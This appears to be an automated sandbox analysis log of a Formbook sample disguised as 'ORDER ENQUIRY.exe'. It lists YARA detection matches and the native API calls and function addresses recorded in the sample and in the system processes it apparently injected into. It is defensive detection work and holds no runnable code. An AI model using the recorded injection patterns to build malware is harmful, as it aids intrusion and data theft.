          Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4564943648.00000000106AF000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: ORDER ENQUIRY.exe PID: 3032, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ORDER ENQUIRY.exe PID: 4564, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: colorcpl.exe PID: 3944, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: initial sampleStatic PE information: Filename: ORDER ENQUIRY.exe
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041A350 NtCreateFile,3_2_0041A350
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041A400 NtReadFile,3_2_0041A400
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041A480 NtClose,3_2_0041A480
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041A530 NtAllocateVirtualMemory,3_2_0041A530
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041A34A NtCreateFile,3_2_0041A34A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041A3FC NtReadFile,3_2_0041A3FC
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041A47A NtClose,3_2_0041A47A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041A52A NtAllocateVirtualMemory,3_2_0041A52A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01AF2BF0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2B60 NtClose,LdrInitializeThunk,3_2_01AF2B60
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2AD0 NtReadFile,LdrInitializeThunk,3_2_01AF2AD0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01AF2DF0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2DD0 NtDelayExecution,LdrInitializeThunk,3_2_01AF2DD0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_01AF2D30
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_01AF2D10
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_01AF2CA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01AF2C70
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2FB0 NtResumeThread,LdrInitializeThunk,3_2_01AF2FB0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2F90 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01AF2F90
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2FE0 NtCreateFile,LdrInitializeThunk,3_2_01AF2FE0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2F30 NtCreateSection,LdrInitializeThunk,3_2_01AF2F30
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01AF2EA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_01AF2E80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF4340 NtSetContextThread,3_2_01AF4340
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF4650 NtSuspendThread,3_2_01AF4650
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2BA0 NtEnumerateValueKey,3_2_01AF2BA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2B80 NtQueryInformationFile,3_2_01AF2B80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2BE0 NtQueryValueKey,3_2_01AF2BE0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2AB0 NtWaitForSingleObject,3_2_01AF2AB0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2AF0 NtWriteFile,3_2_01AF2AF0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2DB0 NtEnumerateKey,3_2_01AF2DB0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2D00 NtSetInformationFile,3_2_01AF2D00
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2CF0 NtOpenProcess,3_2_01AF2CF0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2CC0 NtQueryVirtualMemory,3_2_01AF2CC0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2C00 NtQueryInformationProcess,3_2_01AF2C00
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2C60 NtCreateKey,3_2_01AF2C60
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2FA0 NtQuerySection,3_2_01AF2FA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2F60 NtCreateProcessEx,3_2_01AF2F60
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2EE0 NtQueueApcThread,3_2_01AF2EE0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF2E30 NtWriteVirtualMemory,3_2_01AF2E30
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF3090 NtSetValueKey,3_2_01AF3090
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF3010 NtOpenDirectoryObject,3_2_01AF3010
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF35C0 NtCreateMutant,3_2_01AF35C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF39B0 NtGetContextThread,3_2_01AF39B0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF3D10 NtOpenProcessToken,3_2_01AF3D10
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF3D70 NtOpenThread,3_2_01AF3D70
          Source: C:\Windows\explorer.exeCode function: 4_2_10697232 NtCreateFile,4_2_10697232
          Source: C:\Windows\explorer.exeCode function: 4_2_10698E12 NtProtectVirtualMemory,4_2_10698E12
          Source: C:\Windows\explorer.exeCode function: 4_2_10698E0A NtProtectVirtualMemory,4_2_10698E0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_048D2CA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2C60 NtCreateKey,LdrInitializeThunk,5_2_048D2C60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_048D2C70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2DD0 NtDelayExecution,LdrInitializeThunk,5_2_048D2DD0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_048D2DF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_048D2D10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_048D2EA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2FE0 NtCreateFile,LdrInitializeThunk,5_2_048D2FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2F30 NtCreateSection,LdrInitializeThunk,5_2_048D2F30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2AD0 NtReadFile,LdrInitializeThunk,5_2_048D2AD0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_048D2BE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_048D2BF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2B60 NtClose,LdrInitializeThunk,5_2_048D2B60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D35C0 NtCreateMutant,LdrInitializeThunk,5_2_048D35C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D4650 NtSuspendThread,5_2_048D4650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D4340 NtSetContextThread,5_2_048D4340
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2CC0 NtQueryVirtualMemory,5_2_048D2CC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2CF0 NtOpenProcess,5_2_048D2CF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2C00 NtQueryInformationProcess,5_2_048D2C00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2DB0 NtEnumerateKey,5_2_048D2DB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2D00 NtSetInformationFile,5_2_048D2D00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2D30 NtUnmapViewOfSection,5_2_048D2D30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2E80 NtReadVirtualMemory,5_2_048D2E80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2EE0 NtQueueApcThread,5_2_048D2EE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2E30 NtWriteVirtualMemory,5_2_048D2E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2F90 NtProtectVirtualMemory,5_2_048D2F90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2FA0 NtQuerySection,5_2_048D2FA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2FB0 NtResumeThread,5_2_048D2FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2F60 NtCreateProcessEx,5_2_048D2F60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2AB0 NtWaitForSingleObject,5_2_048D2AB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2AF0 NtWriteFile,5_2_048D2AF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2B80 NtQueryInformationFile,5_2_048D2B80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D2BA0 NtEnumerateValueKey,5_2_048D2BA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D3090 NtSetValueKey,5_2_048D3090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D3010 NtOpenDirectoryObject,5_2_048D3010
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D3D10 NtOpenProcessToken,5_2_048D3D10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D3D70 NtOpenThread,5_2_048D3D70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_048D39B0 NtGetContextThread,5_2_048D39B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288A350 NtCreateFile,5_2_0288A350
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288A480 NtClose,5_2_0288A480
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288A400 NtReadFile,5_2_0288A400
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288A530 NtAllocateVirtualMemory,5_2_0288A530
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288A3FC NtReadFile,5_2_0288A3FC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288A34A NtCreateFile,5_2_0288A34A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288A47A NtClose,5_2_0288A47A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0288A52A NtAllocateVirtualMemory,5_2_0288A52A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0476A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,5_2_0476A036
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04769BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,5_2_04769BAF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0476A042 NtQueryInformationProcess,5_2_0476A042
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04769BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_04769BB2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_015ED3E40_2_015ED3E4
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_07730F780_2_07730F78
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_07730F880_2_07730F88
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_07738C280_2_07738C28
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_07730B500_2_07730B50
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_077333400_2_07733340
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_077313C00_2_077313C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_077313AF0_2_077313AF
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 0_2_07732A680_2_07732A68
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041E0B03_2_0041E0B0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_004011753_2_00401175
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041EA703_2_0041EA70
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041E28A3_2_0041E28A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041DBB23_2_0041DBB2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041E4C23_2_0041E4C2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_00402D8C3_2_00402D8C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_00409E4B3_2_00409E4B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_00409E503_2_00409E50
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041D6DB3_2_0041D6DB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041E72C3_2_0041E72C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_0041DFEA3_2_0041DFEA
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B801AA3_2_01B801AA
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B741A23_2_01B741A2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B781CC3_2_01B781CC
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB01003_2_01AB0100
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5A1183_2_01B5A118
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B481583_2_01B48158
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B520003_2_01B52000
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACE3F03_2_01ACE3F0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B803E63_2_01B803E6
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7A3523_2_01B7A352
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B402C03_2_01B402C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B602743_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B805913_2_01B80591
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC05353_2_01AC0535
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6E4F63_2_01B6E4F6
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B644203_2_01B64420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B724463_2_01B72446
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABC7C03_2_01ABC7C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC07703_2_01AC0770
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE47503_2_01AE4750
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADC6E03_2_01ADC6E0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC29A03_2_01AC29A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B8A9A63_2_01B8A9A6
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD69623_2_01AD6962
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA68B83_2_01AA68B8
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE8F03_2_01AEE8F0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACA8403_2_01ACA840
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC28403_2_01AC2840
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B76BD73_2_01B76BD7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7AB403_2_01B7AB40
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABEA803_2_01ABEA80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD8DBF3_2_01AD8DBF
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABADE03_2_01ABADE0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5CD1F3_2_01B5CD1F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACAD003_2_01ACAD00
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60CB53_2_01B60CB5
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB0CF23_2_01AB0CF2
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0C003_2_01AC0C00
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3EFA03_2_01B3EFA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACCFE03_2_01ACCFE0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB2FC83_2_01AB2FC8
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B62F303_2_01B62F30
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B02F283_2_01B02F28
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE0F303_2_01AE0F30
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B34F403_2_01B34F40
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7CE933_2_01B7CE93
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD2E903_2_01AD2E90
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7EEDB3_2_01B7EEDB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7EE263_2_01B7EE26
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0E593_2_01AC0E59
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACB1B03_2_01ACB1B0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AF516C3_2_01AF516C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B8B16B3_2_01B8B16B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAF1723_2_01AAF172
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7F0E03_2_01B7F0E0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B770E93_2_01B770E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC70C03_2_01AC70C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6F0CC3_2_01B6F0CC
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B0739A3_2_01B0739A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7132D3_2_01B7132D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAD34C3_2_01AAD34C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC52A03_2_01AC52A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B612ED3_2_01B612ED
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADB2C03_2_01ADB2C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5D5B03_2_01B5D5B0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B895C33_2_01B895C3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B775713_2_01B77571
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7F43F3_2_01B7F43F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB14603_2_01AB1460
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7F7B03_2_01B7F7B0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B716CC3_2_01B716CC
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B056303_2_01B05630
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B559103_2_01B55910
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC99503_2_01AC9950
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADB9503_2_01ADB950
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC38E03_2_01AC38E0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B2D8003_2_01B2D800
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADFB803_2_01ADFB80
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B35BF03_2_01B35BF0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AFDBF93_2_01AFDBF9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7FB763_2_01B7FB76
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B05AA03_2_01B05AA0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B61AA33_2_01B61AA3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5DAAC3_2_01B5DAAC
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6DAC63_2_01B6DAC6
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B33A6C3_2_01B33A6C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B77A463_2_01B77A46
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7FA493_2_01B7FA49
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADFDC03_2_01ADFDC0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B77D733_2_01B77D73
